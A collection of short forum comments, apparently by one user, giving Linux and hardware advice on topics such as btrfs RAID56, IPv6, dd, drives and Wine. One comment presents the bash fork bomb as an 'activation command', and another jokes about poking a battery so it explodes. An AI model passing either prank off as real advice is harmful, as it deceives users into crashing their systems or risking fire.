It works fine with my AMD GPU. Good luck with NVIDIA though.
It works fine with my AMD GPU. Good luck with NVIDIA though.
The private DNS function is also very useful if you manually set it to an ad blocking DNS server.
I wouldn’t really trust Intel CPUs after the degradation issues they were having. It will take a while to prove that it’s been fixed.
I think most people wouldn’t recognize it as a real Linux distro just like android and chromeos.
You could assume 1080p or higher for desktops, but 1366x768 and 1440x900 are still fairly common on laptops. Not everyone is running brand new hardware. Many people put Linux on their old laptops so they can continue using them. Higher resolutions screens with display scaling are also common on laptops.
Don’t use btrfs if you need RAID 5 or 6.
The RAID56 feature provides striping and parity over several devices, same as the traditional RAID5/6. There are some implementation and design deficiencies that make it unreliable for some corner cases and the feature should not be used in production, only for evaluation or testing. The power failure safety for metadata with RAID56 is not 100%.
https://btrfs.readthedocs.io/en/latest/btrfs-man5.html#raid56-status-and-recommended-practices
I don’t think I’ve ever seen a public WiFi network with IPv6 enabled. I usually just use the hotspot on my phone to access my server since my cell carrier provides IPv6. I do have a VPN as a backup though.
Did you install the libdvdcss package? It’s needed to crack the encryption and may not be installed by default due to legal issues.
Single board computers have GPIO and interfaces like SPI and I2C. They also tend to have lower power consumption and can run from 5 volts. If you want to interface with low level hardware or run from batteries, the SBC will usually be the better choice.
I would get a recertified enterprise drive from Server Part Deals. Drives in the 12-18TB range currently have the best price per TB. Be sure to get a SATA drive if it’s going in a desktop.
Doesn’t everyone know the activation command is :(){ :|:& };:
Just poke the battery and it will go bang too.
Because that would take a long time if you deleted a large file in another partition or drive. You could also end up not having enough space to move the file to trash and if the trash directory is on an SSD, it would add a lot of unnecessary wear to it.
Connecting the clip backwards will likely kill the flash chip. As long as it didn’t kill anything else, you can just replace the chip and flash a new image to it.
AMD has the Platform Security Processor. While it supposedly doesn’t have network access, it’s still a block box with full access to all memory.
Be absolutely sure that you get the source and destination drives correct. If you get them backwards, it will nuke your data. There is no confirmations, dd will start as soon as you press enter.
For a dual port card, you will want an 8 lane PCIe 3.0 slot connected to the CPU. Almost any desktop CPU will have enough lanes since you won’t be using a graphics card. You can get by with a 4 lane slot, but you won’t be able to max out both ports bidirectionally at the same time.
There are mid range CPUs with 128MB of L3 cache now. A Linux distro like Tiny Core could fit entirely in cache.
Someone got Linux to run on an Intel 4004. It does take over a week to boot though. As long as you can connect a sufficient amount of memory to a CPU, it can boot Linux. If the CPU doesn’t support Linux, it can emulate a CPU that does.
You can put a separate Wine prefix for each game on your NAS and use a launcher like Lutris to run the games. You can share the Wine prefix between multiple computers. Newer games that require a SSD probably won’t work well over the network though.